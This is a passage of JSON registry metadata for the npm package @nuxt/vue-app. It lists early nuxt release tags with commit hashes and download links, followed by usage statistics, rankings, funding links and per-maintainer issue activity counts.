4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:52:09.823Z","dependent_packages_count":19,"downloads":584253,"downloads_period":"last-month","dependent_repos_count":56792,"rankings":{"downloads":0.24416019620205834,"dependent_repos_count":0.1261835131226652,"dependent_packages_count":1.2361533092375532,"stargazers_count":0.15447521562107158,"forks_count":0.5200789827399681,"docker_downloads_count":0.43739883261343837,"average":0.45307500825612584},"purl":"pkg:npm/%40nuxt/vue-app","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/vue-app","docker_dependents_count":252,"docker_downloads_count":1373618,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/vue-app","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/vue-app/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-app/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-app